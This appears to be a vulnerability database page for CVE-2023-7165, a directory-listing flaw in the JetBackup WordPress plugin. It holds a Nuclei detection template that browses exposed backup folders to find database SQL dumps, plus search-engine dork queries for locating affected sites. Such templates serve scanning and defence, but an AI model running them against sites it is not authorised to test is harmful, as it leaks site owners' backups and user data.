| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2023-7165 | 27 Feb 202410:26 | – | circl | |
| WordPress plugin JetBackup security vulnerability | 27 Feb 202400:00 | – | cnnvd | |
| CVE-2023-7165 | 27 Feb 202408:30 | – | cve | |
| CVE-2023-7165 JetBackup < 2.0.9.9 - Directory Listing Exposing Backups | 27 Feb 202408:30 | – | cvelist | |
| CVE-2023-7165 | 27 Feb 202409:15 | – | nvd | |
| CVE-2023-7165 | 27 Feb 202409:15 | – | osv | |
| WordPress Backup Plugin < 2.0.9.9 is vulnerable to Sensitive Data Exposure | 27 Feb 202400:00 | – | patchstack | |
| Information disclosure | 27 Feb 202409:15 | – | prion | |
| PT-2024-15218 | 27 Feb 202400:00 | – | ptsecurity | |
| CVE-2023-7165 | 23 May 202505:22 | – | redhatcve |
id: CVE-2023-7165
info:
name: JetBackup <= 2.0.9.7 - Sensitive Information Exposure via Directory Listing
author: pussycat0x
severity: high
description: |
JetBackup WordPress plugin <= 2.0.9.9 does not use index files to prevent directory listing in certain configurations, letting malicious actors leak backup files, exploit requires access to the web server.
impact: |
Attackers can access and leak sensitive backup files, potentially leading to data exposure and security breaches.
remediation: |
Update to version 2.0.9.9 or later that implements index files to prevent directory listing.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup/jetbackup-wp-backup-migrate-restore-2097-sensitive-information-exposure-via-directory-listing
- https://wpscan.com/vulnerability/ad1ef4c5-60c1-4729-81dd-f626aa0ce3fe/
- https://plugins.trac.wordpress.org/changeset/3016772/backup
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-7165
cwe-id: CWE-548
cpe: cpe:2.3:a:developer177:jetbackup:*:*:*:*:*:wordpress:*:*
epss-score: 0.01915
epss-percentile: 0.77369
metadata:
verified: true
max-request: 2
vendor: jetbackup
product: jetbackup
framework: wordpress
publicwww-query: "/wp-content/plugins/backup/"
fofa-query: body="/wp-content/plugins/backup/"
google-query: inurl:"/wp-content/uploads/jetbackup/"
shodan-query: http.html:"/wp-content/plugins/backup/"
tags: cve,cve2023,wordpress,wp-plugin,jetbackup,wp,unauth
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/jetbackup/"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "Index of","jetbackup")'
condition: and
internal: true
extractors:
- type: regex
name: folder_name
part: body
group: 1
regex:
- 'href="([^"]*_D\d{14}[^"]*)/"'
internal: true
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/jetbackup/{{folder_name}}/"
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'contains(body, ".sgbp")'
- 'status_code == 200'
condition: and
extractors:
- type: regex
name: database_dump
part: body
group: 1
regex:
- 'href="([^"]+_database\.sql)"'
internal: true
# digest: 490a0046304402202aa5459e39a51feebae0a79d1abfe57bd049ecd540449e3da7448814f1149b3002207eb63a46d38dc8151b26929a7b7f8f907e6e2cd9c1b0085fd0978c8085c2987b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation